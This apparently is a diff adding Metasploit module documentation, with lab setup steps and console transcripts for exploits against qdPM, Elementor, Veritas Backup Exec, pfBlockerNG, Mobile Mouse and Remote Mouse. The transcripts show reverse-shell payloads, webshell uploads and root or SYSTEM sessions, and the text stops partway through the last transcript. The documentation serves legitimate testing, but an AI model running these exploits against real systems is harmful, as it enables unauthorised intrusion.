+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
+target => Generic (PHP Payload)
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+
+[*] Started reverse TCP handler on 192.168.2.177:4444
+[*] Attempt to login with 'johndoe@localhost.com:easyone'
+[*] Uploading PHP payload (1123 bytes)...
+[*] Executing 'JGvak.php'
+[*] Sending stage (39927 bytes) to 192.168.2.177
+[!] Removing: 993379-JGvak.php
+[*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
+
+(Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+Server username: www-data
+```
+
+## Installation
+
+QDPM 9.1 relies on outdated software, and installing it can be quite nuanced. Please run the provided script to get the application set up together with a web server, the right version of PHP, and MySQL. This is tested on a fresh installation of Ubuntu Server 22.04.
+
+```
+apt install software-properties-common -y
+add-apt-repository ppa:ondrej/php
+apt update
+apt install -y nginx php7.3-fpm php7.3-mysql php7.3-xml php7.3-gd mariadb-server unzip wget
+systemctl enable --now mariadb.service php7.3-fpm.service
+mysql -e "UPDATE mysql.user SET Password = PASSWORD('password') WHERE User = 'root'"
+mysql -e "DROP USER ''@'$(hostname)'"
+mysql -e "DROP DATABASE test"
+mysql -e "FLUSH PRIVILEGES"
+mysql -e "CREATE DATABASE qdpm_db default charset utf8"
+mysql -e "CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass'"
+mysql -e "GRANT ALL PRIVILEGES ON qdpm_db.* TO 'user'@'localhost';"
+cd /opt
+wget https://www.exploit-db.com/apps/f922670e98bcbcff923d9bfaf430e669-qdPM_9.1.zip -O qdPM_9.1.zip
+unzip -d /var/www/html/qdpm qdPM_9.1.zip
+rm qdPM_9.1.zip
+chown -R www-data:www-data /var/www/html/qdpm/
+rm /etc/nginx/sites-available/default
+rm /etc/nginx/sites-enabled/default
+tee -a /etc/nginx/sites-available/default > /dev/null <<EOT
+server {
+    listen 80 default_server;
+    listen [::]:80 default_server;
+    root /var/www/html/qdpm/;
+    index index.php;
+
+    location / {
+        try_files \$uri /index.php\$is_args\$args;
+    }
+
+    location ~* \.php$ {
+        fastcgi_pass unix:/var/run/php/php7.3-fpm.sock;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME \$realpath_root\$fastcgi_script_name;
+        fastcgi_param DOCUMENT_ROOT \$realpath_root;
+    }
+
+    error_log /var/log/nginx/qdpm_error.log;
+    access_log /var/log/nginx/qdpm_access.log;
+}
+EOT
+ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
+systemctl start nginx.service
+systemctl reload nginx.service
+```
+
+If the script runs successfully, you should have a webserver serving the application on port 80.  
+Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against.
@@ -0,0 +1,74 @@
+## Vulnerable Application
+
+The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability
+that allows any authenticated user to upload and execute any PHP file. This is achieved
+by sending a request to install Elementor Pro from a user supplied zip file.
+Any user with Subscriber or more permissions is able to execute this.
+
+Tested against Elementor 3.6.1
+
+### Plugin
+
+Can be downloaded from https://wordpress.org/plugins/elementor/advanced/
+
+## Verification Steps
+
+
+1. Install the plugin, no configuration is required, just hit skip.
+2. Start msfconsole
+3. Do: `use exploits/multi/http/wp_plugin_elementor_auth_upload_rce`
+4. Do: `set username [username]`
+5. Do: `set password [password]`
+6. Do: `set rhosts [ip]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+## Scenarios
+
+
+### Elementor 3.6.1 on Wordpress 5.7.7 on Ubuntu 20.04
+
+```
+resource (elementor.rb)> use exploits/multi/http/wp_plugin_elementor_auth_upload_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+resource (elementor.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (elementor.rb)> set username user
+username => user
+resource (elementor.rb)> set password user
+password => user
+resource (elementor.rb)> set verbose true
+verbose => true
+msf6 exploit(multi/http/wp_plugin_elementor_auth_upload_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/elementor/readme.txt
+[*] Found version 3.6.1 in the plugin
+[+] The target appears to be vulnerable.
+[*] Looking for nonce
+[+] Nonce: cfb42a92ae
+[*] Uploading upgrade payload and activating...
+[*] Payload file name: elementor-pro.php
+[*] Sending stage (39927 bytes) to 2.2.2.2
+[+] Deleted ../wp-content/plugins/elementor-pro
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:33052) at 2022-10-02 15:56:35 -0400
+[+] Payload Uploaded Successfully
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64
+Meterpreter : php/linux
+```
@@ -0,0 +1,272 @@
+## Vulnerable Application
+
+Backup Exec consists of a server component as well as remote agents that are
+installed on each host that should be backed up by the server.
+
+There are remote agents available for a range of data sources, including
+operating-system level agents for Windows and Linux hosts' local filesystems,
+application-specific agents for Microsoft Exchange, SharePoint, Active
+Directory, etc., and agents for virtual machines such as VMware or Hyper-V
+instances. This exploit targets the Windows and Linux OS-level remote agents.
+The agents are installed as services running by default with
+`NT AUTHORITY\SYSTEM` or `root` user rights for Windows and Linux respectively.
+
+Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These
+agents' versions are distributed with Backup Exec versions 21.1 and below.
+
+A trial version of Backup Exec can be downloaded from Veritas'
+[website](https://www.veritas.com/form/trialware/backup-exec).
+All supported version of Backup Exec is available in Veritas'
+[download center](https://www.veritas.com/content/support/en_US/downloads/).
+
+## Verification Steps
+
+1. Download Backup Exec distributive and install Backup Exec Remote
+   Agent on Windows or Linux host.
+2. Start `msfconsole`.
+3. Select the module and set the address of the host running the remote agent:
+```
+   use exploit/multi/veritas/beagent_sha_auth_rce
+   set RHOSTS [REMOTE_AGENT_HOST]
+```
+4. Check the service is running and potentially vulnerable with the `check`
+   command.
+5. Set TARGET (Windows or Linux) depending on operating system on the host
+   running the remote agent:
+```
+   set TARGET [OS_NAME]
+```
+6. Set and configure preferred payload:
+```
+   set PAYLOAD [PAYLOAD_NAME]
+   set LHOST [LOCAL_IP]
+   set LPORT [LOCAL_PORT]
+```
+7. If Backup Exec Remote Agent run on the Linux then set preferred interpreter
+   to execute the command (by default, `/bin/bash`). The option does not matter
+   for Windows hosts since the command will always be executed using
+   `C:\Windows\System32\cmd.exe`.
+```
+   set INTERPRETER [INTERPRETER_NAME]
+```
+8. Start the module using the `exploit` command.
+9. Enjoy the received shell.
+
+An example session is as follows:
+
+```
+msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
+rhosts => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT   10000            yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.180.141:10000 - Exploiting ...
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.141:10000 - Passing SHA authentication
+[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 172.16.180.141
+[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+## Options
+
+### INTERPRETER
+The command line interpreter for executing Linux OS command. By default, the option is
+`/bin/bash`. For Windows the option does not matter and the command will always be
+executed using `C:\Windows\System32\cmd.exe`.
+
+## Scenarios
+
+The Backup Exec Remote Agent is installed on each host that has local filesystems
+that should be backed up. These agents listen on the network for NDMP connections
+(10000/tcp), appearing in Nmap scans with scripts enabled as follows:
+
+```
+$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
+...
+Discovered open port 10000/tcp on 172.16.180.133
+Discovered open port 10000/tcp on 172.16.180.132
+Discovered open port 10000/tcp on 172.16.180.141
+...
+$ nmap -p10000 -n -sV 172.16.180.133
+...
+10000/tcp open  ndmp    Symantec/Veritas Backup Exec ndmp (NDMPv3)
+...
+```
+
+(Note that the `ndmp-version` script fails to execute due to not sending an
+`NDMP_CONNECT_OPEN` request before querying version information with the
+`NDMP_CONFIG_GET_HOST_INFO` request. This exploit module's `check` command will
+carry this query out successfully.)
+
+### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
+rhosts => 192.168.123.147
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.123.147:10000 - Checking vulnerability
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Getting supported authentication types
+[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 192.168.123.147:10000 - BE agent revision: 9.3
+[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 192.168.123.147:10000 - Exploiting ...
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
+[*] 192.168.123.147:10000 - Passing SHA authentication
+[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 192.168.123.147
+[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-BE1QFC9
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.147 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
+rhosts => 172.16.199.133
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
+target => 1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.133:10000 - Checking vulnerability
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Getting supported authentication types
+[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
+[*] 172.16.199.133:10000 - BE agent revision: 9.2
+[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.199.133:10000 - Exploiting ...
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
+[*] 172.16.199.133:10000 - Passing SHA authentication
+[*] 172.16.199.133:10000 - Uploading payload with CmdStager
+[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3020772 bytes) to 172.16.199.133
+[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : debian.test.com
+OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > Interrupt: use the 'exit' command to quit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.16.199.133 - Meterpreter session 2 closed.  Reason: User exit
+```
+
+### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
+rhosts => 172.16.180.135
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > 
+```
@@ -0,0 +1,189 @@
+## Vulnerable Application
+
+### Description
+This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
+attackers to execute execute arbitrary OS commands as root via shell meta characters in the HTTP Host header.
+Versions <= 2.1.4_26 are vulnerable. Note that version 3.x is unaffected.
+
+### Setup
+Download the pfSense image:
+
+`wget https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.5.2-RELEASE-amd64.iso.gz`
+
+To obtain a vulnerable copy of the pfBlockerNG plugin, you can build it from source from the [official pfSense github
+repo](https://github.com/pfsense/FreeBSD-ports/tree/devel/net/pfSense-pkg-pfBlockerNG), or it can be downloaded from
+the following link:
+
+`wget https://files01.netgate.com/pkg/pfSense_plus-v21_09_aarch64-pfSense_plus_v21_09/All/pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+Install the .iso file in your favorite virtualizing software. You may need to use the `UEFI` or `BIOS` installation
+options to install the software correctly. For testing, `BIOS` was used. You may also need to set the WAN settings.
+For this you can just use the default or set it to `hn0` which should also be the default, and this will work fine for
+testing purposes.
+
+Once installed pfSense will start and you can access the web GUI by navigating to `https://<pfSense-IP-address>/`.
+Sign into the application with username: `admin` password: `pfsense`
+
+Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
+beside `Enable Secure Shell`. Then click the `Save` button at the the bottom of the page to apply the changes.
+
+From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`
+
+`scp pfSense-pkg-pfBlockerNG-2.1.4_26.pkg root@<pfSense-IP-address>:/`
+
+(the root password of the VM will be the same as the admin password: `pfsense`)
+
+Install the vulnerable package with: `pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+## Options
+
+### WEBSHELL_NAME
+
+This is the name of the webshell that will get uploaded to the pfsense target sans the ".php" ending.
+If left unset the file name will be randomly generated.
+
+## Verification Steps
+
+1. Start msfconsole
+1. `use unix/http/pfsense_pfblockerng_webshell`
+1. Set the `RHOST` and `LHOST` options
+1. `exploit`
+1. Receive a shell as the `root` user
+
+## Scenarios
+### pfSense 2.5.2-RELEASE with pfSense-pkg-pfBlockerNG-2.1.4_26.pkg installed
+```
+msf6 > use exploit/unix/http/pfsense_pfblockerng_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set RHOSTS 172.23.40.111
+RHOSTS => 172.23.40.111
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LHOST 172.23.47.143
+LHOST => 172.23.47.143
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LPORT 4453
+LPORT => 4453
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set SRVPORT 8383
+SRVPORT => 8383
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        8383             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (bsd/x64/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4453             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   BSD Dropper
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse TCP handler on 172.23.47.143:4453 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: zFOOjmPXX.php
+[+] The target is vulnerable.
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://172.23.47.143:8383/ITtfiF
+[*] Client 172.23.40.111 (curl/7.76.1) requested /ITtfiF
+[*] Sending payload to 172.23.40.111 (curl/7.76.1)
+[+] Deleted /usr/local/www/zFOOjmPXX.php
+[*] Command shell session 1 opened (172.23.47.143:4453 -> 172.23.40.111:30301) at 2022-10-12 19:08:21 -0500
+
+id
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+exit
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0
+TARGET => 0
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        9933             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4545             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse double SSL handler on 172.23.47.143:4545 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: jIuhcpoe.php
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo XqZbye7zG7tGBVWc;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "XqZbye7zG7tGBVWc\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/www/jIuhcpoe.php
+[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+```
+
@@ -1,6 +1,6 @@
 ## Description
 This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
-Additional information can be viewed on https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
+Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/

 ## Verification Steps
 [Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol
+to deploy a payload and run it from the server.  This module will only deploy
+a payload if the server is set without a password (default).
+Tested against 3.6.0.4, current at the time of module writing
+
+Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/mobile_mouse_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Mobile Mouse.
+
+## Options
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `3`, but can be a little touchy.
+
+## Scenarios
+
+###  Mobile Mouse 3.6.0.4 on Windows 10
+
+```
+resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mobile_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (mobile_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (mobile_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/mobile_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:9099 - Client name set to: M6braOok6j
+[*] 1.1.1.1:9099 - Connecting
+[+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D
+[*] 1.1.1.1:9099 - Opening Command Prompt
+[*] 1.1.1.1:9099 - Sending stager
+[*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/
+[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:9099 - Opening Command Prompt again
+[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:9099 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 1.1.1.1
+[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400
+[*] 1.1.1.1:9099 - Server stopped.
+[!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Windows\Temp>whoami
+whoami
+win10prolicense\windows
+
+C:\Windows\Temp>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Mobile Mouse 3.6.0.4 on Windows 10, with a password
+
+This should fail as the exploit was not written to work with a password.
+
+```
+resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mobile_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (mobile_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (mobile_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/mobile_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q
+[*] 1.1.1.1:9099 - Connecting
+[-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+This module utilizes the Remote Mouse Server by Emote Interactive protocol
+to deploy a payload and run it from the server.  This module will deploy
+a payload regardless if server authentication is required.
+Tested against 4.110, current at the time of module writing
+
+Version 4.110 can be downloaded from https://www.remotemouse.net/downloads/RemoteMouse.exe
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_mouse_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+### PATH
+
+The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.
+
+## Scenarios
+
+###  Remote Mouse 4.110 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (remote_mouse.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
